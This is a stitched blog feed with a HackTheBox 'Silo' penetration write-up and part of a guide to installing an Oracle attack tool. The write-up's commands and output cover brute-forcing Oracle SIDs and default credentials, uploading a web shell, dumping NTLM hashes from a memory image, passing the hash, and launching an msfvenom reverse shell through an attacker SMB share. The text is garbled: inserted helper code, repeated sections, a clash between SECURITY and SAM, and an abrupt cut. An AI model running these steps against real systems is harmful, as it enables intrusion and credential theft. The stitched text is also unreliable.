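0xffffc00000028000 0x0000000000a70000 \REGISTRY\MACHINE\SYSTEM
0xffffc00000103000 0x000000003205d000 \SystemRoot\System32\Config\SOFTWARE
0xffffc000061a3000 0x0000000027532000 \SystemRoot\System32\Config\SECURITY
0xffffc00000619000 0x0000000026cc5000 \SystemRoot\System32\Config\SAM
"""

HASHDUMP_SAMPLE = """
Volatility Foundation Volatility Framework 2.6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969:::
"""


def parse_hivelist(text):
    """Return {hive name: virtual offset} for every data row of hivelist output."""
    hives = {}
    for line in text.splitlines():
        m = HIVE_RE.match(line.strip())
        if m:
            hives[m.group(3).strip()] = m.group(1)
    return hives


def hashdump_offsets(hives):
    """Pick the (SYSTEM, SAM) virtual offsets that hashdump -y/-s expects.

    hashdump decrypts account hashes in the SAM using the boot key from
    SYSTEM. SECURITY is a different hive (LSA secrets, cached logons), so
    pointing -s at it is a common mistake; match on the hive file name.
    """
    system = sam = None
    for name, offset in hives.items():
        leaf = name.rsplit("\\", 1)[-1].upper()
        if leaf == "SYSTEM":
            system = offset
        elif leaf == "SAM":
            sam = offset
    if system is None or sam is None:
        raise ValueError("hivelist output does not contain both SYSTEM and SAM")
    return system, sam


def hashdump_command(dump_file, profile, hivelist_text):
    """Build the argv for the hashdump run directly from hivelist output."""
    system, sam = hashdump_offsets(parse_hivelist(hivelist_text))
    return ["volatility", "-f", dump_file, "--profile=" + profile,
            "hashdump", "-y", system, "-s", sam]


def triage_hashdump(text):
    """Parse pwdump-style lines and flag what a defender should look at first.

    Returns {username: {"rid": int, "lm": str, "nt": str, "flags": [...]}}.
    Banners, warnings and blank lines are skipped.
    """
    accounts = {}
    for line in text.splitlines():
        m = HASH_RE.match(line.strip())
        if not m:
            continue
        user, rid = m.group(1), int(m.group(2))
        lm, nt = m.group(3).lower(), m.group(4).lower()
        flags = []
        if rid == 500:
            flags.append("builtin_administrator")  # RID 500 even if the account is renamed
        if rid == 501:
            flags.append("builtin_guest")
        if lm != EMPTY_LM:
            flags.append("lm_hash_stored")  # legacy LM hash still kept: trivially crackable
        if nt == EMPTY_NT:
            flags.append("empty_password")
        accounts[user] = {"rid": rid, "lm": lm, "nt": nt, "flags": flags}
    return accounts


if __name__ == "__main__":
    print(" ".join(hashdump_command("SILO-20180105-221806.dmp", "Win2012R2x64", HIVELIST_SAMPLE)))
    for user, info in triage_hashdump(HASHDUMP_SAMPLE).items():
        print(user, info["rid"], info["flags"])
```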

&lt;h3 id=&quot;getting-system&quot;&gt;Getting System&lt;/h3&gt;
&lt;p&gt;Now we can use the hashes we dumped with a tool like &lt;code class=&quot;highlighter-rouge&quot;&gt;pth-winexe&lt;/code&gt; on Kali to get administrator privileges.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/Desktop# pth-winexe -U &quot;Administrator%aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::&quot; //10.10.10.82 cmd
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32&amp;gt;whoami
whoami
silo\administrator

C:\Windows\system32&amp;gt;
C:\Users\Administrator\Desktop&amp;gt;type root.txt
type root.txt
cd3...[redacted]....
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
&lt;h3 id=&quot;getting-systemv2&quot;&gt;Getting System v2&lt;/h3&gt;

&lt;p&gt;We can use the &lt;code class=&quot;highlighter-rouge&quot;&gt;externaltable&lt;/code&gt; module to execute a binary (or command) on the system. Combining impacket-smbserver with externaltable, we can achieve remote code execution.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;generating our payload&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:/opt/serve/windows/kk# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.98 LPORT=6969 -f exe &amp;gt; 6969.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Start up an &lt;code class=&quot;highlighter-rouge&quot;&gt;impacket-smbserver&lt;/code&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:/opt/serve/windows# impacket-smbserver kk kk
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;em&gt;execute our payload stored on our smb share&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:/opt/odat# ./odat.py externaltable -s 10.10.10.82 -U SCOTT -P tiger -d XE --sysdba --exec \\\\10.10.14.98\\kk 6969.exe

[1] (10.10.10.82:1521): Execute the 6969.exe command stored in the \\10.10.14.98\kk path
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;em&gt;getting system shell&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;msf exploit(multi/handler) &amp;gt; run

[*] Started reverse TCP handler on 10.10.14.98:6969
[*] Sending stage (206403 bytes) to 10.10.10.82
[*] Meterpreter session 1 opened (10.10.14.98:6969 -&amp;gt; 10.10.10.82:49173) at 2018-08-04 22:53:15 -0400

msf exploit(multi/handler) &amp;gt; sessions -i 1
[*] Starting interaction with 1...

meterpreter &amp;gt; getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter &amp;gt; sysinfo
Computer        : SILO
OS              : Windows 2012 R2 (Build 9600).
Architecture    : x64
System Language : en_GB
Domain          : HTB
Logged On Users : 0
Meterpreter     : x64/windows
meterpreter &amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;</content><author><name>A Medic (@OnlyaMedic)</name></author><category term="writeup" /><category term="pentesting" /><category term="hackthebox" /><category term="oracle" /><category term="volatility" /><summary type="html">
100% |###################################################################################################################################################################################################################################################################################################| Time: 00:10:55 [1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521) 100% |###################################################################################################################################################################################################################################################################################################| Time: 00:00:12 [1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521) [+] 'XE' is a valid SID. Continue... 100% |###################################################################################################################################################################################################################################################################################################| Time: 00:07:31 [+] SIDs found on the 10.10.10.82:1521 server: SAMPLE,SCAN4,XE,XEXDB We can use the metasploit module msf &amp;gt; use admin/oracle/oracle_login to bruteforce SIDS msf &amp;gt; use admin/oracle/oracle_login msf auxiliary(admin/oracle/oracle_login) &amp;gt; msf auxiliary(admin/oracle/oracle_login) &amp;gt; options Module options (auxiliary/admin/oracle/oracle_login): Name Current Setting Required Description ---- --------------- -------- ----------- CSVFILE /usr/share/metasploit-framework/data/wordlists/oracle_default_passwords.csv no The file that contains a list of default accounts. RHOST yes The Oracle host. RPORT 1521 yes The TNS port. SID ORCL yes The sid to authenticate with. 
msf auxiliary(admin/oracle/oracle_login) &amp;gt; set RHOST 10.10.10.82 RHOST =&amp;gt; 10.10.10.82 msf auxiliary(admin/oracle/oracle_login) &amp;gt; set SID XE SID =&amp;gt; XE msf auxiliary(admin/oracle/oracle_login) &amp;gt; run -j [*] Auxiliary module running as background job 0. [*] Starting brute force on 10.10.10.82:1521... [+] Found user/pass of: scott/tiger on 10.10.10.82 with sid XE [*] Auxiliary module execution completed You will discover that there is a valid user account for scott:tiger We also discover that we can connect to the database as SYSDBA. failed connection as sysoper root@dastinia:/opt/odat# sqlplus SCOTT/tiger@10.10.10.82/XE as sysoper SQL*Plus: Release 12.1.0.2.0 Production on Sat Aug 4 16:14:55 2018 Copyright (c) 1982, 2014, Oracle. All rights reserved. ERROR: ORA-01031: insufficient privileges Enter user-name: connecting as sysdba root@dastinia:/opt/odat# sqlplus SCOTT/tiger@10.10.10.82/XE as sysdba SQL*Plus: Release 12.1.0.2.0 Production on Sat Aug 4 16:15:23 2018 Copyright (c) 1982, 2014, Oracle. All rights reserved. Connected to: Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production SQL&amp;gt; Exploitation From reading over the modules there seemed to be a few modules we could attempt to leverage for code execution, or arbitrary file upload/read. The ODAT developer was extremely nice to provide a wiki of all the modules, and some examples: utlfile - Allows us to upload/download files from our local machine to the remote machine externaltabe - allows us to execute a binary with the priviledges of the Oracle database server (only if the binary is stored on the server) ctxsys - Read file from the local server dbmsadvisor - upload file to the local server So some attack paths we can take: Since a web service is running on the box we can upload a web shell (aspx) to interact with the server Upload binary payload like something generated with msfvenom, and execute it. 
Read potentially sensitive files which we can use to attempt to utilize for further privilege escalation. I used the first method since we will end up discovering that the oracle database was running with system privileges. I used the following aspx web shell, and uploaded to the well-known default IIS web root directory C:\inetpub\wwwroot. root@dastinia:/opt/odat# ./odat.py utlfile -s 10.10.10.82 -d XE -U SCOTT -P tiger --putFile 'C:\inetpub\wwwroot\' 'shell.aspx' /root/htb/silo/silo_shell.aspx --sysdba [1] (10.10.10.82:1521): Put the /root/htb/silo/silo_shell.aspx local file in the C:\inetpub\wwwroot\ folder like shell.aspx on the 10.10.10.82 server [+] The /root/htb/silo/silo_shell.aspx file was created on the C:\inetpub\wwwroot\ directory on the 10.10.10.82 server like the shell.aspx file Analyzing Memory Dump with Volatility We are given a dropbox link, and a password to access what appears to be a memory dump. Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested): Dropbox link provided to vendor (and password under separate cover). 
Dropbox link https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0 link password: £%Hm8646uC$ Let’s begin analyzing this memory dump by inspecting the processes root@dastinia:~/Desktop# volatility -f SILO-20180105-221806.dmp --profile=Win2012R2x64 pslist RuntimeError: module compiled against API version 0xb but this version of numpy is 0xa Volatility Foundation Volatility Framework 2.6 Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit ------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------ 0xffffe00000089940 System 4 0 84 0 ------ 0 2018-01-05 22:17:14 UTC+0000 0xffffe00000c9c100 smss.exe 208 4 3 0 ------ 0 2018-01-05 22:17:14 UTC+0000 0xffffe000034f54c0 csrss.exe 324 316 10 0 0 0 2018-01-05 22:17:15 UTC+0000 0xffffe000034ec380 csrss.exe 396 388 10 0 1 0 2018-01-05 22:17:16 UTC+0000 0xffffe000034ac940 wininit.exe 404 316 4 0 0 0 2018-01-05 22:17:16 UTC+0000 0xffffe00002fee080 winlogon.exe 448 388 5 0 1 0 2018-01-05 22:17:16 UTC+0000 0xffffe00003550940 services.exe 492 404 10 0 0 0 2018-01-05 22:17:16 UTC+0000 0xffffe00003ed4080 lsass.exe 500 404 6 0 0 0 2018-01-05 22:17:16 UTC+0000 0xffffe00003f22500 svchost.exe 560 492 15 0 0 0 2018-01-05 22:17:16 UTC+0000 0xffffe00003f39940 svchost.exe 604 492 15 0 0 0 2018-01-05 22:17:16 UTC+0000 0xffffe00003f6f680 dwm.exe 688 448 9 0 1 0 2018-01-05 22:17:16 UTC+0000 0xffffe00003f68940 vmacthlp.exe 708 492 2 0 0 0 2018-01-05 22:17:16 UTC+0000 0xffffe00003fb9080 svchost.exe 764 492 16 0 0 0 2018-01-05 22:17:17 UTC+0000 0xffffe00003fcc940 svchost.exe 800 492 63 0 0 0 2018-01-05 22:17:17 UTC+0000 0xffffe00003fe3940 svchost.exe 832 492 20 0 0 0 2018-01-05 22:17:17 UTC+0000 0xffffe00004e267c0 svchost.exe 920 492 25 0 0 0 2018-01-05 22:17:17 UTC+0000 0xffffe00004e8d940 svchost.exe 340 492 16 0 0 0 2018-01-05 22:17:17 UTC+0000 0xffffe00004f2e940 spoolsv.exe 308 492 13 0 0 0 2018-01-05 22:17:17 UTC+0000 0xffffe00004f5c940 
svchost.exe 1052 492 11 0 0 0 2018-01-05 22:17:17 UTC+0000 0xffffe00004f84940 oracle.exe 1088 492 30 0 0 0 2018-01-05 22:17:17 UTC+0000 0xffffe00004fe93c0 OraClrAgnt.exe 1192 492 2 0 0 0 2018-01-05 22:17:18 UTC+0000 0xffffe00004fef940 TNSLSNR.EXE 1208 492 5 0 0 0 2018-01-05 22:17:18 UTC+0000 0xffffe00004ff0300 agtctl.exe 1216 1192 0 -------- 0 0 2018-01-05 22:17:18 UTC+0000 2018-01-05 22:17:18 UTC+0000 0xffffe00004ff3940 agtctl.exe 1264 1192 0 -------- 0 0 2018-01-05 22:17:18 UTC+0000 2018-01-05 22:17:18 UTC+0000 0xffffe00004ffc440 svchost.exe 1272 492 4 0 0 0 2018-01-05 22:17:18 UTC+0000 0xffffe00004fff080 VGAuthService. 1324 492 3 0 0 0 2018-01-05 22:17:18 UTC+0000 0xffffe000060568c0 agtctl.exe 1348 1192 0 -------- 0 0 2018-01-05 22:17:18 UTC+0000 2018-01-05 22:17:18 UTC+0000 0xffffe000060767c0 agtctl.exe 1388 1192 0 -------- 0 0 2018-01-05 22:17:18 UTC+0000 2018-01-05 22:17:18 UTC+0000 0xffffe0000608f780 vmtoolsd.exe 1444 492 8 0 0 0 2018-01-05 22:17:18 UTC+0000 0xffffe000060a62c0 ManagementAgen 1492 492 9 0 0 0 2018-01-05 22:17:18 UTC+0000 0xffffe000060c7940 svchost.exe 1516 492 16 0 0 0 2018-01-05 22:17:19 UTC+0000 0xffffe00003051940 svchost.exe 2000 492 5 0 0 0 2018-01-05 22:17:27 UTC+0000 0xffffe00003077880 TPAutoConnSvc. 
1256 492 8 0 0 0 2018-01-05 22:17:27 UTC+0000 0xffffe000030a1080 dllhost.exe 1432 492 21 0 0 0 2018-01-05 22:17:27 UTC+0000 0xffffe000030b7940 dllhost.exe 1600 492 17 0 0 0 2018-01-05 22:17:27 UTC+0000 0xffffe000030cd940 WmiPrvSE.exe 1440 560 12 0 0 0 2018-01-05 22:17:27 UTC+0000 0xffffe000030cf940 msdtc.exe 2052 492 13 0 0 0 2018-01-05 22:17:27 UTC+0000 0xffffe00003117940 VSSVC.exe 2228 492 7 0 0 0 2018-01-05 22:17:29 UTC+0000 0xffffe00003149080 sppsvc.exe 2284 492 5 0 0 0 2018-01-05 22:17:29 UTC+0000 0xffffe0000315f940 SppExtComObj.E 2312 560 5 0 0 0 2018-01-05 22:17:29 UTC+0000 0xffffe000061637c0 taskhostex.exe 2368 800 7 0 1 0 2018-01-05 22:17:33 UTC+0000 0xffffe00004e00680 explorer.exe 2424 2416 56 0 1 0 2018-01-05 22:17:33 UTC+0000 0xffffe00000df34c0 ServerManager. 2732 2376 24 0 1 0 2018-01-05 22:17:35 UTC+0000 0xffffe0000301c940 TPAutoConnect. 2824 1256 3 0 1 0 2018-01-05 22:17:37 UTC+0000 0xffffe00003f698c0 conhost.exe 2832 2824 1 0 1 0 2018-01-05 22:17:37 UTC+0000 0xffffe0000136d080 vmtoolsd.exe 2992 2424 8 0 1 0 2018-01-05 22:17:45 UTC+0000 0xffffe00003224540 WmiPrvSE.exe 3056 560 19 0 0 0 2018-01-05 22:17:47 UTC+0000 0xffffe00003239940 WmiPrvSE.exe 2340 560 10 0 0 0 2018-01-05 22:17:47 UTC+0000 0xffffe0000325c940 WmiApSrv.exe 864 492 5 0 0 0 2018-01-05 22:17:48 UTC+0000 0xffffe00003203340 DumpIt.exe 2932 2424 4 0 1 0 2018-01-05 22:18:06 UTC+0000 0xffffe00003f8c940 conhost.exe 2764 2932 2 0 1 0 2018-01-05 22:18:06 UTC+0000 It looks like the forensics tool DumpIT was used to create this memory dump. Which likely means it was done with admin privileges. We can use the hashdump volatility module to dump the hashes of the accounts stored on the system. This is the equivalent of doing a hashdump with meterpreter. We just need to get the virtual offsets of the SYSTEM &amp;amp; SECURITY hives using the hivelist module first. Which happen to be 0xffffc00000028000 &amp;amp; 0xffffc00000619000 respectively.) 
root@dastinia:~/Desktop# volatility -f SILO-20180105-221806.dmp --profile=Win2012R2x64 hivelist RuntimeError: module compiled against API version 0xb but this version of numpy is 0xa Volatility Foundation Volatility Framework 2.6 Virtual Physical Name ------------------ ------------------ ---- 0xffffc0000100a000 0x000000000d40e000 \??\C:\Users\Administrator\AppData\Local\Microsoft\Windows\UsrClass.dat 0xffffc000011fb000 0x0000000034570000 \SystemRoot\System32\config\DRIVERS 0xffffc00001600000 0x000000003327b000 \??\C:\Windows\AppCompat\Programs\Amcache.hve 0xffffc0000001e000 0x0000000000b65000 [no name] 0xffffc00000028000 0x0000000000a70000 \REGISTRY\MACHINE\SYSTEM 0xffffc00000052000 0x000000001a25b000 \REGISTRY\MACHINE\HARDWARE 0xffffc000004de000 0x0000000024cf8000 \Device\HarddiskVolume1\Boot\BCD 0xffffc00000103000 0x000000003205d000 \SystemRoot\System32\Config\SOFTWARE 0xffffc00002c43000 0x0000000028ecb000 \SystemRoot\System32\Config\DEFAULT 0xffffc000061a3000 0x0000000027532000 \SystemRoot\System32\Config\SECURITY 0xffffc00000619000 0x0000000026cc5000 \SystemRoot\System32\Config\SAM 0xffffc0000060d000 0x0000000026c93000 \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT 0xffffc000006cf000 0x000000002688f000 \SystemRoot\System32\Config\BBI 0xffffc000007e7000 0x00000000259a8000 \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT 0xffffc00000fed000 0x000000000d67f000 \??\C:\Users\Administrator\ntuser.dat dumping hashes root@dastinia:~/Desktop# volatility -f SILO-20180105-221806.dmp --profile=Win2012R2x64 hashdump -y 0xffffc00000028000 -s 0xffffc00000619000 RuntimeError: module compiled against API version 0xb but this version of numpy is 0xa Volatility Foundation Volatility Framework 2.6 Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969::: Getting System Now we 
can use the hashes we dumped with a tool like pth-winexe on kali to get administrator privileges. root@dastinia:~/Desktop# pth-winexe -U &quot;Administrator%aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::&quot; //10.10.10.82 cmd E_md4hash wrapper called. HASH PASS: Substituting user supplied NTLM HASH... Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Windows\system32&amp;gt;whoami whoami silo\administrator C:\Windows\system32&amp;gt; C:\Users\Administrator\Desktop&amp;gt;type root.txt type root.txt cd3...[redacted].... Getting Systemv2 We can use the externaltable module to execute a binary (or command) against the system. Using a combination of impacket-smbserver + externaltable we can achieve remote code execution. generating our payload root@dastinia:/opt/serve/windows/kk# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.98 LPORT=6969 -f exe &amp;gt; 6969.exe No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x64 from the payload No encoder or badchars specified, outputting raw payload Payload size: 510 bytes Final size of exe file: 7168 bytes Start up an impacket-smbserver root@dastinia:/opt/serve/windows# impacket-smbserver kk kk Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Config file parsed execute our payload stored on our smb share root@dastinia:/opt/odat# ./odat.py externaltable -s 10.10.10.82 -U SCOTT -P tiger -d XE --sysdba --exec \\\\10.10.14.98\\kk 6969.exe [1] (10.10.10.82:1521): Execute the 6969.exe command stored in the \\10.10.14.98\kk path getting system shell msf exploit(multi/handler) &amp;gt; run [*] Started reverse TCP handler on 10.10.14.98:6969 [*] Sending stage 
(206403 bytes) to 10.10.10.82 [*] Meterpreter session 1 opened (10.10.14.98:6969 -&amp;gt; 10.10.10.82:49173) at 2018-08-04 22:53:15 -0400 msf exploit(multi/handler) &amp;gt; sessions -i 1 [*] Starting interaction with 1... meterpreter &amp;gt; getuid Server username: NT AUTHORITY\SYSTEM meterpreter &amp;gt; sysinfo Computer : SILO OS : Windows 2012 R2 (Build 9600). Architecture : x64 System Language : en_GB Domain : HTB Logged On Users : 0 Meterpreter : x64/windows meterpreter &amp;gt;</summary></entry><entry><title type="html">Installing Oracle Database Attacking Tool (ODAT) on Kali Rolling (2018)</title><link href="https://dastinia.io/tutorial/2018/07/31/installing-oracle-database-attacking-tool-on-kali/" rel="alternate" type="text/html" title="Installing Oracle Database Attacking Tool (ODAT) on Kali Rolling (2018)" /><published>2018-07-31T00:00:00-04:00</published><updated>2018-07-31T00:00:00-04:00</updated><id>https://dastinia.io/tutorial/2018/07/31/installing-oracle-database-attacking-tool-on-kali</id><content type="html" xml:base="https://dastinia.io/tutorial/2018/07/31/installing-oracle-database-attacking-tool-on-kali/">&lt;h2 id=&quot;overview&quot;&gt;Overview&lt;/h2&gt;

&lt;p&gt;I decided to write a quick little guide on installing the &lt;a href=&quot;https://github.com/quentinhardy/odat&quot;&gt;Oracle Database Attacking Tool (ODAT)&lt;/a&gt; on the latest version of Kali Linux since I noticed people were running into issues with it.&lt;/p&gt;

&lt;p&gt;ODAT is an open source penetration testing tool targeted at attacking and auditing the security of Oracle Database servers.&lt;/p&gt;

&lt;h2 id=&quot;requirements&quot;&gt;Requirements&lt;/h2&gt;
&lt;ol&gt;
  &lt;li&gt;git&lt;/li&gt;
  &lt;li&gt;python 2.7.x&lt;/li&gt;
  &lt;li&gt;An account on oracle.com or use something like &lt;a href=&quot;http://bugmenot.com/&quot;&gt;bugmenot.com&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;h2 id=&quot;installation&quot;&gt;Installation&lt;/h2&gt;

&lt;p&gt;Note: For this setup ODAT is being installed on the latest version of Kali at the moment (2018.2).&lt;/p&gt;

&lt;p&gt;We are also installing the development version of ODAT, which seems to work better than the release binaries.&lt;/p&gt;

&lt;h3 id=&quot;getting-instaclient-sdk-and-sqlplus&quot;&gt;Getting instantclient, sdk, and sqlplus&lt;/h3&gt;

&lt;p&gt;Oracle forces you to register to their site in order to download pretty much anything (thanks oracle).&lt;/p&gt;

&lt;p&gt;You can register with a temporary address from a service like &lt;a href=&quot;https://10minutemail.com&quot;&gt;10minutemail.com&lt;/a&gt;, with your own personal email (why?), or use &lt;a href=&quot;http://bugmenot.com/&quot;&gt;bugmenot.com&lt;/a&gt; to get a login. After you’ve logged in, download the following items.&lt;/p&gt;

&lt;p&gt;(all version 12.2.0.1.0)&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;&lt;a href=&quot;http://download.oracle.com/otn/linux/instantclient/122010/instantclient-basic-linux.x64-12.2.0.1.0.zip&quot;&gt;instantclient-basic-linux.x64-12.2.0.1.0.zip&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;http://download.oracle.com/otn/linux/instantclient/122010/instantclient-sqlplus-linux.x64-12.2.0.1.0.zip&quot;&gt;instantclient-sqlplus-linux.x64-12.2.0.1.0.zip&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;http://download.oracle.com/otn/linux/instantclient/122010/instantclient-sdk-linux.x64-12.2.0.1.0.zip&quot;&gt;instantclient-sdk-linux.x64-12.2.0.1.0.zip&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Copy all three zips from the Downloads directory into the &lt;code class=&quot;highlighter-rouge&quot;&gt;/opt/oracle&lt;/code&gt; directory.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@kali:~/Downloads# mkdir -p /opt/oracle/
root@kali:~/Downloads# cp instantclient-* /opt/oracle/
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
&lt;p&gt;Once the zips are in place, unzip the basic package, &lt;code class=&quot;highlighter-rouge&quot;&gt;instantclient-basic-linux.x64-12.2.0.1.0.zip&lt;/code&gt;, first and the other two after it.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@kali:~/Downloads# cd /opt/oracle/
root@kali:/opt/oracle# unzip instantclient-basic-linux.x64-12.1.0.2.0.zip
root@kali:/opt/oracle# unzip instantclient-sdk-linux.x64-12.1.0.2.0.zip
root@kali:/opt/oracle# unzip instantclient-sqlplus-linux.x64-12.1.0.2.0.zip
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;You should now have an &lt;em&gt;“instantclient_12_1”&lt;/em&gt; directory.&lt;/p&gt;

&lt;p&gt;Create a symlink named &lt;code class=&quot;highlighter-rouge&quot;&gt;libclntsh.so&lt;/code&gt; pointing at the &lt;code class=&quot;highlighter-rouge&quot;&gt;libclntsh.so.12.1&lt;/code&gt; shared object.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@kali:/opt/oracle# cd instantclient_12_1/
root@kali:/opt/oracle/instantclient_12_1# ln -s libclntsh.so.12.1 libclntsh.so
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Add the following to your &lt;code class=&quot;highlighter-rouge&quot;&gt;~/.bashrc&lt;/code&gt; (single quotes, so that &lt;code class=&quot;highlighter-rouge&quot;&gt;$PATH&lt;/code&gt; is written literally and expanded when the file is sourced, rather than having the current value baked in):&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;echo '
export PATH=$PATH:/opt/oracle/instantclient_12_1
export SQLPATH=/opt/oracle/instantclient_12_1
export TNS_ADMIN=/opt/oracle/instantclient_12_1
export LD_LIBRARY_PATH=/opt/oracle/instantclient_12_1
export ORACLE_HOME=/opt/oracle/instantclient_12_1
' &amp;gt;&amp;gt; ~/.bashrc
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Reload bashrc:&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@kali:/opt/oracle/instantclient_12_1# source ~/.bashrc
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;If you are able to run &lt;code class=&quot;highlighter-rouge&quot;&gt;sqlplus&lt;/code&gt; without any errors you are good to continue.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@kali:/opt/oracle/instantclient_12_1# sqlplus

SQL*Plus: Release 12.1.0.2.0 Production on Wed Aug 1 03:08:10 2018

Copyright (c) 1982, 2014, Oracle.  All rights reserved.

Enter user-name:
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
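&lt;p&gt;The instant client steps above, packaged as an added shell helper that is not part of the original guide or of ODAT: it finds whichever &lt;code class=&quot;highlighter-rouge&quot;&gt;instantclient_*&lt;/code&gt; directory was unzipped (the guide’s download links and unzip commands cite 12.2 and 12.1 respectively, so the helper is version-agnostic), creates the &lt;code class=&quot;highlighter-rouge&quot;&gt;libclntsh.so&lt;/code&gt; symlink, appends the environment block to an rc file exactly once with &lt;code class=&quot;highlighter-rouge&quot;&gt;$PATH&lt;/code&gt; left literal, and checks the result. It assumes the zips have already been unzipped under a base directory such as &lt;code class=&quot;highlighter-rouge&quot;&gt;/opt/oracle&lt;/code&gt;; all function names are my own.&lt;/p&gt;

```shell
# Added helper for the instant client steps (not part of the original guide or of ODAT).
# Assumes the instantclient zips were already unzipped under a base directory such as
# /opt/oracle, so that an instantclient_MAJOR_MINOR directory exists there.
# Two pitfalls it avoids: a hard link where a symlink is wanted, and a double-quoted
# echo that bakes the current $PATH into .bashrc instead of expanding it at source time.

# Print the unzipped instantclient directory under base dir $1 (last one if several).
find_instantclient_dir() {
    set -- "$1"/instantclient_*_*
    [ -d "$1" ] || return 1
    for d; do last_dir="$d"; done
    printf '%s\n' "$last_dir"
}

# Point libclntsh.so at the versioned library in dir $1 (a symlink, as the guide intends).
link_clntsh() {
    dir="$1"
    set -- "$dir"/libclntsh.so.[0-9]*
    [ -f "$1" ] || { echo "no libclntsh.so.VERSION found in $dir"; return 1; }
    for f; do target="$f"; done
    ln -sf "$(basename "$target")" "$dir/libclntsh.so"
}

# Append the environment block for dir $1 to rc file $2, only if it is not already there.
# tee -a also echoes the block so the operator sees exactly what was written.
append_env() {
    dir="$1"; rc="$2"
    touch "$rc"
    if grep -qF "# oracle instantclient: $dir" "$rc"; then
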